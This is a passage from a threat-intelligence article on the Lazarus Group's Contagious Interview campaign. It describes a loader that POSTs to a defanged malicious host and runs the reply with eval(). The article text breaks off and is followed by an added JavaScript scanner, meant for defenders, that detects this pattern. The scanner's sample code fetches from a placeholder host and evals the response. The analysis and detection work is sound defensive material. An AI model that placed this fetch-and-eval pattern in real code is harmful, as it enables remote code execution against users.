Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique
The Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed a rapid evolution in the delivery mechanisms for the campaign’s main payloads: BeaverTail, InvisibleFerret, and OtterCookie.
In this article, we discuss the innovations in the delivery techniques used by the group and show that the group’s modus operandi is preserved as their code evolves. To this end, we analyzed three distinct malicious projects that were highly active in campaigns.
Delivery Mechanism 1: Eval Function
In one of the projects, the group’s developers added a code snippet that sends a POST request to the external host fashdefi[.]store on port 6168.
The code then captures the response to that request, stores it in a token object, and executes its contents with the eval() function.
In this way, the code snippet above, located within the catch block, prevents the main payload (in this case, ‘invisible …
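To illustrate how a defender can triage source for the pattern described above (a remote request inside a catch block whose response is handed to eval()), here is an added heuristic scanner written for this article; it is not the article's or the malware's own code. The sample it scans is constructed, with a placeholder host; only the port and path mirror the page's description.

```javascript
'use strict';
// Added example: regex-based heuristic (a triage aid, not a full JS parser).
// Flags a catch block that both performs a network call and evals non-literal data.

// Network-call markers: the eval'd data is assumed to come from one of these.
const NET_CALL = /\b(?:fetch|axios(?:\.post|\.get)?|https?\.request|XMLHttpRequest)\s*\(/;
// eval() whose argument is not a plain string literal (i.e. data, not code).
const DYNAMIC_EVAL = /\beval\s*\(\s*(?!['"`])[^)]*\)/;
// First quoted host[:port] inside the block, e.g. 'http://host.example:6168/path'.
const HOST_PORT = /['"`](?:https?:\/\/)?([a-z0-9.-]+\.[a-z]{2,})(?::(\d{2,5}))?[^'"`]*['"`]/i;

// Return each `catch (...) { ... }` body with the line on which it starts.
// Brace counting ignores braces inside strings, hence "heuristic".
function extractCatchBlocks(src) {
  const blocks = [];
  const re = /\bcatch\b[^{]*\{/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    let depth = 1, i = re.lastIndex;
    while (i < src.length && depth > 0) {
      if (src[i] === '{') depth++;
      else if (src[i] === '}') depth--;
      i++;
    }
    const line = src.slice(0, m.index).split('\n').length;
    blocks.push({ line, body: src.slice(re.lastIndex, i - 1) });
  }
  return blocks;
}

// One finding per suspicious catch block: { line, host, port } for triage.
function scanForEvalLoader(src) {
  const findings = [];
  for (const { line, body } of extractCatchBlocks(src)) {
    if (!NET_CALL.test(body) || !DYNAMIC_EVAL.test(body)) continue;
    const hp = HOST_PORT.exec(body);
    findings.push({ line, host: hp ? hp[1] : null, port: hp && hp[2] ? Number(hp[2]) : null });
  }
  return findings;
}

// Constructed sample mimicking the described flow; loader.example is a placeholder host.
const SAMPLE = `
try {
  require('./invisible_placeholder');
} catch (e) {
  const token = {};
  axios.post('http://loader.example:6168/defy/v7', {}).then(r => {
    token.data = r.data;
    eval(token.data);
  });
}
`;

console.log(JSON.stringify(scanForEvalLoader(SAMPLE)));
```

The same scan can be run over a cloned repository's .js files before a build step executes them; a hit on a catch block that both reaches the network and evals its response warrants manual review.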
IoC